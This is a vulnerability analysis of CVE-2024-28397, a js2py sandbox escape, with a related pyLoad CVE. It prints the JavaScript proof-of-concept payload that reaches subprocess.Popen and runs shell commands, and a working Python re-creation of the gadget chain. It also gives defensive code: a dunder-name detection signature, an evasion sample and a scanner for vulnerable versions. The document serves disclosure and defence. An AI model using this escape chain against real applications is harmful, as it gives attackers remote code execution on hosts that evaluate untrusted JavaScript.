CVE-2024-28397
Description
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Ratings
- Attacker Value: High
- Exploitability: High
Technical Analysis
Js2py is a JavaScript-to-Python translator and JavaScript interpreter written in 100% pure Python; it describes itself as an implementation of the JavaScript core in Python. Versions of js2py <= 0.74 contain a sandbox escape: an attacker who can supply JavaScript to the interpreter can obtain a reference to a Python object from inside the js2py environment, and from that single reference reach the Python runtime and execute arbitrary commands on the host. At the time of writing no patch has been merged into the main branch of the project, although a PR is open. Version 0.74, released Nov 6, 2022, is the latest release of js2py.
Looking at the proposed one-line patch, the issue is apparent: the method getOwnPropertyNames is supposed to return a list of the object's own property names, but it mistakenly returns a reference to the underlying Python object itself. With that knowledge we can analyze the PoC and see how this bug allows RCE. The following is a JavaScript payload an attacker would send to a vulnerable endpoint to be parsed by js2py:
object = Object.getOwnPropertyNames({}) // [1]
attribute = object.__getattribute__ // [2]
n11 = attribute("__getattribute__") // [3]
obj = n11("__class__").__base__ // [4]
- [1]: Object.getOwnPropertyNames({}) should return an array of property names (an empty one here), but as the patch shows it returns the underlying Python object instead, so every later step is introspecting a Python object rather than a JavaScript array.
- [2]: __getattribute__ is the Python special method that implements attribute access on an object; it is called for every attribute lookup, whether or not the attribute exists. This line stores the object's __getattribute__ method in the variable attribute.
- [3]: This line calls the __getattribute__ method (stored in attribute) with the argument "__getattribute__". That retrieves the __getattribute__ method from the Python object and assigns it to n11. If Python object introspection reminds you of the movie Inception, that's okay.
- [4]: Now we have a function n11 that we can use to read the __class__ attribute of the object, and then the __base__ attribute of that class, which walks one step up the class hierarchy towards Python's root object class. With that in place we can do some damage.
We can see how the PoC then takes that class and passes it to the function findpopen(o):
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
This function recursively walks the subclass tree below obj via __subclasses__(), looking for a class whose __module__ is subprocess and whose __name__ is Popen, i.e. Python's subprocess.Popen class (it skips type so the walk does not descend into metaclasses). With a reference to Popen in hand, the last line spawns cmd (the command string, defined elsewhere in the full PoC) and reads its output with communicate(); the positional arguments map onto Popen's args, bufsize, executable, stdin, stdout, stderr, preexec_fn, close_fds and shell parameters, where -1 is subprocess.PIPE and the trailing true sets shell=True. In other words, arbitrary commands run on the target directly from JavaScript, and where the application accepts JavaScript from unauthenticated users, remotely and without authentication. Very cool. The full PoC can be found here.
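The same gadget chain in plain Python, added here as an illustration (it is not the PoC and not js2py code): it starts from an arbitrary leaked object, climbs to the root object class, and walks __subclasses__() exactly as findpopen() does. The one assumption is that the subprocess module is already loaded in the target process, which the JavaScript PoC relies on too: the walk can only find Popen if something has imported subprocess, otherwise an attacker needs a different gadget.

```python
import subprocess  # assumption: the target process already has subprocess loaded, as pyLoad does


def find_class(root, module, name, _seen=None):
    """Depth-first walk of root.__subclasses__(), the Python twin of the PoC's
    findpopen(): return the class whose __module__ and __name__ match, else None."""
    if _seen is None:
        _seen = set()
    for cls in root.__subclasses__():
        if cls in _seen:
            continue
        _seen.add(cls)
        if cls.__module__ == module and cls.__name__ == name:
            return cls
        # The PoC skips `type` so the walk does not descend into metaclasses.
        if cls.__name__ != "type":
            found = find_class(cls, module, name, _seen)
            if found is not None:
                return found
    return None


def gadget_chain(leaked):
    """Steps [2]-[4] of the payload using nothing but attributes reachable from
    the leaked object: no module names and no builtins are in scope."""
    attribute = leaked.__getattribute__        # [2]
    n11 = attribute("__getattribute__")        # [3]
    cls = n11("__class__")                     # [4] class of the leaked object
    # The PoC takes a single __base__ step; __mro__[-1] reaches `object` from any depth.
    root = cls.__mro__[-1]
    return find_class(root, "subprocess", "Popen")


def run_via_gadget(leaked, cmd):
    """Spawn `cmd` through the recovered Popen class, as the PoC's last line does.
    -1 is subprocess.PIPE; the PoC passes stdout and stderr as -1 positionally."""
    popen = gadget_chain(leaked)
    if popen is None:
        return None
    proc = popen(cmd, stdout=-1, stderr=-1, shell=True)
    out, _ = proc.communicate()
    return out.decode().strip()


if __name__ == "__main__":
    print(gadget_chain({}))                     # <class 'subprocess.Popen'>
    print(run_via_gadget({}, "echo gadget-ok"))  # gadget-ok
```

The leaked object here is a plain dict, standing in for the Python-side object that getOwnPropertyNames hands back to JavaScript; nothing in the chain depends on which object it is, which is why a sandbox that leaks even one Python object to its guest can be unwound this way.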
Attacker Value and Exploitability
Js2py is just a Python package; to be exploitable it must be used by an application in a way that exposes the vulnerable API functionality (evaluating attacker-supplied JavaScript) to attackers. This makes things interesting: the package is not exploitable by default, but it is correspondingly harder to determine where vulnerable instances of js2py could be lurking. The GitHub repo says the package is used by 15,623 repositories. Seeing as the vulnerability is still unpatched, I'd say this is fairly useful to attackers for a vulnerability in a Python package. It's also quite easy to exploit if the application is using js2py in a vulnerable configuration.
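Two checks a defender can run, added here as an illustration (not from the page or the js2py project): a scan of pip freeze output for js2py pins at or below 0.74, and a signature over the raw JavaScript an application hands to js2py, assuming the application logs or can intercept that JavaScript. The sample payloads are constructed. The third sample shows the signature's limit: splitting a dunder name across string concatenation hides it, so this is triage rather than a control; the real fix is not to evaluate untrusted JavaScript with js2py <= 0.74.

```python
import re

# Python dunder names the js2py escape needs to reach Popen (or another gadget).
# __proto__, __defineGetter__ and friends are ordinary JavaScript and are left out.
ESCAPE_NAMES = {
    "__getattribute__", "__getattr__", "__class__", "__base__", "__bases__",
    "__mro__", "__subclasses__", "__globals__", "__builtins__", "__import__",
}

# Matches `.__name__`, ["__name__"], ['__name__'] and the bare "__name__" string
# argument form the PoC uses in attribute("__getattribute__").
_DUNDER = re.compile(r"""(?:\.|["'])\s*(__[A-Za-z_]+__)\b""")


def scan_js(payload):
    """Return the escape-related dunder names referenced by a JavaScript payload."""
    return {m.group(1) for m in _DUNDER.finditer(payload)} & ESCAPE_NAMES


def is_escape_attempt(payload, threshold=2):
    """Flag a payload that touches at least `threshold` distinct escape names;
    a single hit is left for manual review to keep false positives down."""
    return len(scan_js(payload)) >= threshold


def vulnerable_pins(freeze_lines):
    """From `pip freeze`-style lines, return the js2py pins at or below 0.74."""
    hits = []
    for line in freeze_lines:
        name, sep, version = line.strip().partition("==")
        if sep and name.strip().lower() == "js2py":
            parts = tuple(int(p) for p in version.strip().split(".") if p.isdigit())
            if parts <= (0, 74):
                hits.append(line.strip())
    return hits


# Constructed samples: the page's PoC chain, harmless JavaScript, and a
# concatenation trick that splits "__class__" so the signature misses it.
SAMPLES = {
    "poc": 'object = Object.getOwnPropertyNames({}); attribute = object.__getattribute__; '
           'n11 = attribute("__getattribute__"); obj = n11("__class__").__base__; '
           'obj.__subclasses__()',
    "benign": 'function add(a, b) { return a + b }; var p = {}; p.__proto__.x = add(1, 2)',
    "evasion": 'o = Object.getOwnPropertyNames({}); k = "__cla" + "ss__"; c = o.__getattribute__(k)',
}


def triage(samples=SAMPLES):
    """Map each sample label to (names found, verdict)."""
    return {label: (sorted(scan_js(js)), is_escape_attempt(js)) for label, js in samples.items()}


if __name__ == "__main__":
    for label, (names, flagged) in triage().items():
        print(f"{label:8} flagged={flagged} names={names}")
    print(vulnerable_pins(["Js2Py==0.74", "requests==2.31.0", "js2py==0.71"]))
```

The PoC sample trips on four distinct names, the benign sample touches only __proto__ (a JavaScript property, not a Python gadget) and is ignored, and the evasion sample is seen once, below the threshold; tune threshold to 1 if you would rather review every dunder lookup in submitted JavaScript.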
Related – CVE-2024-39205
This CVE is for pyLoad, a Python download manager which incorrectly exposes js2py to user-supplied input, making it vulnerable to this JavaScript sandbox escape. For more information on how this can be exploited, check out the AKB article.